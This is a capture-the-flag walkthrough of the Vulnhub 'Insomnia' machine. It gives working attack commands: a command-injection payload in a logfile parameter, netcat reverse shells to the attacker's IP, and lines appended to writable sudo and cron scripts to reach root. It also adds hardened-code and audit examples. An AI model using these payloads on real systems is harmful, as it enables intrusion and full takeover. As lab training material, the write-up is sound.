Insomnia Walkthrough – Vulnhub – Writeup
Insomnia is an easy machine from Vulnhub by alienum. To root it we have to understand a parameter that looks like LFI but actually gives command execution, sudo abuse and cron job abuse. Here, I will be doing the full method, i.e. getting the user flag first and then the root flag. Once you have the foothold you can go straight for root, but that is not the path intended by the author.
Link to the machine: https://www.vulnhub.com/entry/insomnia-1,644/
See also: walkthrough of the Orasi machine by the same author.
Identify the target
First, we identify the IP address of the target on the local network.
fping -aqg 10.0.2.0/24
My IP address is 10.0.2.15 and the target's is 10.0.2.114.
Scan the open ports
Next, we scan all TCP ports on the target to find the services we can interact with.
sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.114
Only one port is open, 8080/tcp, serving a web application. So we have to go deep rather than wide, which in my view is the easier case.
Enumerate the web server
The default page has a simple chat interface that only works one way: messages go in and are displayed, nothing answers.
A directory scan reveals more paths.
ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .html,.php,.txt -u http://10.0.2.114:8080/FUZZ -of html -o dir.html -fs 2899
The chat.txt path stores the chat messages.
The administration.php file, however, is more interesting.
From the screenshot above, it looks like the page expects something after the colon. So I checked the chat page again.
A new line had appeared in the chat box, which confirms that the file expects some input. Therefore, I fuzzed for a GET parameter.
ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://10.0.2.114:8080/administration.php?FUZZ=anything' -of html -o admin-get.html -fs 65
Luckily, we found a GET parameter, logfile. Its name suggests file inclusion, but the behaviour is different: the server performs some operation on the named file, which suggests the value is passed to a shell command. So let's try a payload that ends that command and appends our own.
?logfile=chat.txt;whoami
The output of whoami appeared in the chat box, so we have OS command execution. Hence, we can spawn a reverse shell to port 9001.
# on local machine
nc -nlvp 9001
Let's check whether the target has netcat available.
?logfile=;which nc
It does, so we can connect back to our listener. Two things to keep in mind: the browser URL-encodes the spaces and special characters in the value for you (with curl, use -G --data-urlencode), and the -e option exists only in some netcat builds, such as nc.traditional; the OpenBSD netcat does not have it, in which case a bash /dev/tcp or mkfifo-based one-liner is the usual fallback.
?logfile=;nc -e /bin/bash 10.0.2.15 9001
Finally, we got the foothold.
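The injection above works because the value of logfile is spliced into a shell command line. As an added illustration, my own code and not the machine's real administration.php (the writeup never shows its source), here is a shell reconstruction of that pattern next to a hardened version. LOG_DIR and the way the file is read are assumptions:

```sh
#!/bin/sh
# Added example: a reconstruction of the pattern behind
# ?logfile=chat.txt;whoami, not the machine's real code. LOG_DIR is assumed.
LOG_DIR="${LOG_DIR:-/var/www/html}"

# Vulnerable: the parameter is interpolated into a command string and handed
# to a shell, much as shell_exec("cat " . $_GET['logfile']) would in PHP.
# A ";" in the value ends the intended command and starts the attacker's.
vulnerable_show_log() {
  sh -c "cat $LOG_DIR/$1"
}

# Hardened: accept only a bare file name (letters, digits, dot, dash and
# underscore, no slashes and no "..") and pass it as an argument to cat,
# so no user input is ever parsed by a shell.
safe_show_log() {
  case "$1" in
    ''|*/*|*..*|*[!A-Za-z0-9._-]*)
      printf 'rejected: %s\n' "$1" >&2
      return 1 ;;
  esac
  cat -- "$LOG_DIR/$1"
}
```

Calling vulnerable_show_log 'chat.txt;id' prints the log and then runs id, exactly what the chat box showed above; safe_show_log rejects the same value with exit status 1 and only ever opens a file inside LOG_DIR.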
Upgrade to an intelligent reverse shell
Get a user’s access
Next, I checked the sudo rights of the user www-data.
sudo -l
From the screenshot above, we can see that www-data can run a script as the user julia without a password. So, I checked the permissions on that file.
cd /var/www/html
ls -al
It is writable by users other than its owner, root. Therefore, I appended /bin/bash to the end of the script.
echo '/bin/bash' >> start.sh
Now, when the script is executed as julia, the appended line starts bash as julia as well.
sudo -u julia bash /var/www/html/start.sh
Finally, I got the user’s flag.
cd
ls -al
cat user.txt
Root privilege escalation
In the crontab I found a script that is run every minute.
cat /etc/crontab
Then, we check the permissions on that script, as we did for the previous one.
ls -l /var/cron/check.sh
It is also writable by other users. However, since cron runs it in the background, we cannot see its output directly, so it is better to spawn another reverse shell.
nc -nlvp 9002
Then I appended a reverse shell one-liner to the script.
echo 'nc -e /bin/bash 10.0.2.15 9002' >> /var/cron/check.sh
About a minute later the reverse shell came back, and I got the root flag.
cd
ls -al
cat root.txt
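Both privilege escalations rely on the same condition: a script that runs as a more privileged user (through sudo or cron) is writable by a less privileged one. The following script is an added example, not part of the original writeup. It automates that check for a system crontab and for saved sudo -l output, and assumes GNU stat and the crontab and sudo -l line formats shown in the comments:

```sh
#!/bin/sh
# Added example, not code from the original walkthrough. It automates the
# check done by eye above, twice: on /var/www/html/start.sh (run through sudo
# as julia) and on /var/cron/check.sh (run from root's crontab). A target is
# reported when its group or world write bit is set, so a lower-privileged
# user can append commands that then run as the sudo target user or as root.
# GNU stat is assumed (-L follows symlinks such as /bin/sh).

# Print "<path> <mode>" and succeed when an existing file is group- or
# world-writable.
writable_by_others() {
  [ -f "$1" ] || return 1
  mode=$(stat -L -c '%A' "$1")                  # e.g. -rwxrw-rw-
  case "$(printf '%s' "$mode" | cut -c6,9)" in  # group and other write bits
    *w*) printf '%s %s\n' "$1" "$mode" ;;
    *)   return 1 ;;
  esac
}

# Check every absolute path on a command line, so "bash /var/cron/check.sh"
# is caught as well as a script that is run directly.
report_writable_in() {
  label="$1"; shift
  for tok in "$@"; do
    case "$tok" in
      /*) hit=$(writable_by_others "$tok") && printf '%s: %s\n' "$label" "$hit" ;;
    esac
  done
}

# System crontab lines: "m h dom mon dow user command" or "@reboot user command".
# Comments, blank lines and VAR=value settings are skipped.
writable_cron_targets() {
  grep -Ev '^[[:space:]]*(#|$)|^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' "$1" |
  while read -r f1 f2 f3 f4 f5 f6 rest; do
    case "$f1" in
      @*) user="$f2"; cmd="$f3 $f4 $f5 $f6 $rest" ;;
      *)  user="$f6"; cmd="$rest" ;;
    esac
    report_writable_in "cron as $user" $cmd   # word splitting is intended
  done
}

# Saved "sudo -l" output, e.g. "(julia) NOPASSWD: /bin/bash /var/www/html/start.sh".
# Several commands may follow the run-as user, separated by commas.
writable_sudo_targets() {
  grep -E '^[[:space:]]*\(' "$1" |
  while IFS= read -r line; do
    runas=${line%%\)*}; runas=${runas#*\(}      # text inside the parentheses
    printf '%s\n' "${line#*\)}" | tr ',' '\n' |
    sed -E 's/^[[:space:]]*([A-Z]+:[[:space:]]*)*//' |   # drop NOPASSWD: etc.
    while read -r entry; do
      report_writable_in "sudo as $runas" $entry
    done
  done
}

# Stand-alone use on the target as the low-privileged user:
#   sudo -l > /tmp/sudo.txt && writable_sudo_targets /tmp/sudo.txt
[ -r /etc/crontab ] && writable_cron_targets /etc/crontab
```

Any entry it reports can be backdoored exactly as start.sh and check.sh were above; an entry whose every path is writable only by root is not useful for this path, and a hit on an interpreter like /bin/bash rather than on the script itself would be a separate, far worse finding.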